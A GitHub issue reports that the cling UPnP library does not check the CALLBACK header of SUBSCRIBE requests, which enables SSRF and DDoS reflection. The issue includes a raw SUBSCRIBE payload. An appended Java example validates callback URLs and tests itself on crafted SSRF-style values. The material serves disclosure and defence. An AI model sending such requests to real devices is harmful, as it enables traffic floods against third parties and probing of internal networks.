SSRF and DDOS vulnerability #253

Open
YYHYlh opened this issue Jun 10, 2020 · 0 comments
YYHYlh commented Jun 10, 2020

The UPnP protocol implemented in the latest version of cling has a flaw: the CALLBACK parameter in the request header of the service's SUBSCRIBE request is not checked. An attacker can use this flaw to send malicious data to a device developed using cling, which causes the device to send a large amount of data to the IP address specified by the attacker to implement a DDOS attack; at the same time, the vulnerability can be used to implement an SSRF attack on the intranet.
The payload is:

SUBSCRIBE / HTTP/1.1
Host: localhost:9999
Accept-Encoding: identity
User-Agent: Callstranger Vulnerability Checker
CALLBACK: <Malicious address>
TIMEOUT: Second-300
NT: upnp:event
Content-Length: 0
JasonMahdjoub added a commit to JasonMahdjoub/MaDKitLanEdition that referenced this issue Sep 30, 2021
JasonMahdjoub added a commit to JasonMahdjoub/UPnPIGD that referenced this issue Mar 25, 2022
JasonMahdjoub added a commit to JasonMahdjoub/MaDKitLanEdition that referenced this issue Mar 25, 2022
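
One way a SUBSCRIBE handler could check the CALLBACK header before storing a subscription, shown as an added example that is not part of the original issue, not cling's code, and not the change made in the referenced commits. The class and method names are hypothetical, the addresses and header values are constructed, and the policy (accept only `http` delivery URLs whose host is a literal IP equal to the peer address of the connection that sent the request) is an assumption chosen for the illustration.

```java
import java.net.InetAddress;
import java.net.URI;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example: hypothetical helper, not part of cling's API.
public class CallbackFilter {
    // CALLBACK carries one or more delivery URLs, each wrapped in angle brackets.
    private static final Pattern DELIVERY_URL = Pattern.compile("<([^<>]*)>");
    private static final Pattern IPV4_LITERAL = Pattern.compile("\\d{1,3}(\\.\\d{1,3}){3}");

    // Assumed policy: keep a delivery URL only if it is http:// and its host is a
    // literal IP equal to the peer address of the connection that sent SUBSCRIBE.
    static List<URI> acceptedCallbacks(String callbackHeader, InetAddress peer) {
        List<URI> accepted = new ArrayList<>();
        if (callbackHeader == null) return accepted;
        Matcher m = DELIVERY_URL.matcher(callbackHeader);
        while (m.find()) {
            try {
                URI uri = new URI(m.group(1).trim());
                String host = uri.getHost(); // ignores any user-info before '@'
                if (host == null || !"http".equalsIgnoreCase(uri.getScheme())) continue;
                boolean v6 = host.startsWith("[") && host.endsWith("]");
                // Hostnames are refused so that no DNS lookup decides the target.
                if (!v6 && !IPV4_LITERAL.matcher(host).matches()) continue;
                String literal = v6 ? host.substring(1, host.length() - 1) : host;
                // getByName parses a literal address locally, without a resolver query.
                if (InetAddress.getByName(literal).equals(peer)) accepted.add(uri);
            } catch (Exception e) {
                // Malformed URL or address: treat as not accepted.
            }
        }
        return accepted; // empty list: reject the subscription
    }

    public static void main(String[] args) throws Exception {
        InetAddress peer = InetAddress.getByName("192.168.1.20"); // constructed peer address
        String[] headers = {                                      // constructed header values
            "<http://192.168.1.20:8080/events>",
            "<http://10.0.0.5/admin>",
            "<http://192.168.1.20@10.0.0.5/>",
            "<http://events.example/cb><http://192.168.1.20/cb>",
        };
        for (String h : headers) System.out.println(h + " -> " + acceptedCallbacks(h, peer));
    }
}
```

The peer address must come from the accepted socket, never from a request header. Only the first header and the second URL of the last header pass the check; an empty result means the subscription should be refused and no event traffic sent.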